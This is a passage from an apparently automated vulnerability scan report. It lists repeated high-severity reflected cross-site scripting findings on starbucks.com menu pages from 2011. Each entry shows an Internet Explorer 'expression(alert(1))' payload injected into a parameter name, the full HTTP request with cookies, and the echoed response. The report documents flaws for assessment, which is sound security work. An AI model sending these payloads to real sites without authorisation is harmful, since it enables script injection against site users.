The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70519"style%3d"x%3aexpression(alert(1))"4a15c0eea7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70519"style="x:expression(alert(1))"4a15c0eea7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/fruit-cup?70519"style%3d"x%3aexpression(alert(1))"4a15c0eea7e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:51 GMT
Connection: close
Content-Length: 40422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/fruit-cup?70519"style="x:expression(alert(1))"4a15c0eea7e=1"/>
...[SNIP]...

2.273. http://www.starbucks.com/menu/food/salads/garden-pesto-salad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/garden-pesto-salad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902fd"style%3d"x%3aexpression(alert(1))"a1481263ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 902fd"style="x:expression(alert(1))"a1481263ac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/garden-pesto-salad?902fd"style%3d"x%3aexpression(alert(1))"a1481263ac9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:31 GMT
Connection: close
Content-Length: 38600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/garden-pesto-salad?902fd"style="x:expression(alert(1))"a1481263ac9=1"/>
...[SNIP]...

2.274. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/picnic-pasta-salad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e882"style%3d"x%3aexpression(alert(1))"92587de2079 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e882"style="x:expression(alert(1))"92587de2079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/picnic-pasta-salad?5e882"style%3d"x%3aexpression(alert(1))"92587de2079=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:44 GMT
Connection: close
Content-Length: 41357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/picnic-pasta-salad?5e882"style="x:expression(alert(1))"92587de2079=1"/>
...[SNIP]...

2.275. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/chicken-santa-fe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21399"style%3d"x%3aexpression(alert(1))"64c8a4cbb38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21399"style="x:expression(alert(1))"64c8a4cbb38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/chicken-santa-fe?21399"style%3d"x%3aexpression(alert(1))"64c8a4cbb38=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:36 GMT
Connection: close
Content-Length: 42767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe?21399"style="x:expression(alert(1))"64c8a4cbb38=1"/>
...[SNIP]...

2.276. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a9e"style%3d"x%3aexpression(alert(1))"5df87dc4572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92a9e"style="x:expression(alert(1))"5df87dc4572 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich?92a9e"style%3d"x%3aexpression(alert(1))"5df87dc4572=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:41 GMT
Connection: close
Content-Length: 42082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich?92a9e"style="x:expression(alert(1))"5df87dc4572=1"/>
...[SNIP]...

2.277. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95062"style%3d"x%3aexpression(alert(1))"9a2157818d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95062"style="x:expression(alert(1))"9a2157818d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella?95062"style%3d"x%3aexpression(alert(1))"9a2157818d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:21 GMT
Connection: close
Content-Length: 42265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella?95062"style="x:expression(alert(1))"9a2157818d9=1"/>
...[SNIP]...

2.278. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1782"style%3d"x%3aexpression(alert(1))"c12556678ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1782"style="x:expression(alert(1))"c12556678ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini?d1782"style%3d"x%3aexpression(alert(1))"c12556678ba=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:15 GMT
Connection: close
Content-Length: 42828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini?d1782"style="x:expression(alert(1))"c12556678ba=1"/>
...[SNIP]...

2.279. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367b2"style%3d"x%3aexpression(alert(1))"e74a53c9b86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 367b2"style="x:expression(alert(1))"e74a53c9b86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich?367b2"style%3d"x%3aexpression(alert(1))"e74a53c9b86=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:00 GMT
Connection: close
Content-Length: 43358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich?367b2"style="x:expression(alert(1))"e74a53c9b86=1"/>
...[SNIP]...

2.280. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb42"style%3d"x%3aexpression(alert(1))"28976a77c79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fdb42"style="x:expression(alert(1))"28976a77c79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich?fdb42"style%3d"x%3aexpression(alert(1))"28976a77c79=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:26 GMT
Connection: close
Content-Length: 42483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich?fdb42"style="x:expression(alert(1))"28976a77c79=1"/>
...[SNIP]...

2.281. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/dark-cherry-yogurt-parfait

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5726"style%3d"x%3aexpression(alert(1))"71244ff225 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5726"style="x:expression(alert(1))"71244ff225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/yogurt/dark-cherry-yogurt-parfait?e5726"style%3d"x%3aexpression(alert(1))"71244ff225=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:50 GMT
Connection: close
Content-Length: 41443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait?e5726"style="x:expression(alert(1))"71244ff225=1"/>
...[SNIP]...

2.282. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/greek-yogurt-honey-parfait

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54f34"style%3d"x%3aexpression(alert(1))"898a6039ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54f34"style="x:expression(alert(1))"898a6039ac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/yogurt/greek-yogurt-honey-parfait?54f34"style%3d"x%3aexpression(alert(1))"898a6039ac9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:03 GMT
Connection: close
Content-Length: 41314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait?54f34"style="x:expression(alert(1))"898a6039ac9=1"/>
...[SNIP]...

2.283. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74433"style%3d"x%3aexpression(alert(1))"de32106119b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74433"style="x:expression(alert(1))"de32106119b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait?74433"style%3d"x%3aexpression(alert(1))"de32106119b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:15 GMT
Connection: close
Content-Length: 41501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait?74433"style="x:expression(alert(1))"de32106119b=1"/>
...[SNIP]...

2.284. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 604b3"style%3d"x%3aexpression(alert(1))"1631ed89de3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 604b3"style="x:expression(alert(1))"1631ed89de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition?604b3"style%3d"x%3aexpression(alert(1))"1631ed89de3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:13 GMT
Connection: close
Content-Length: 49499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition?604b3"style="x:expression(alert(1))"1631ed89de3=1"/>
...[SNIP]...

2.285. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 460c8"style%3d"x%3aexpression(alert(1))"93db86d9ebc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 460c8"style="x:expression(alert(1))"93db86d9ebc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition/20-under-200?460c8"style%3d"x%3aexpression(alert(1))"93db86d9ebc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:55 GMT
Connection: close
Content-Length: 38413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?460c8"style="x:expression(alert(1))"93db86d9ebc=1"/>
...[SNIP]...

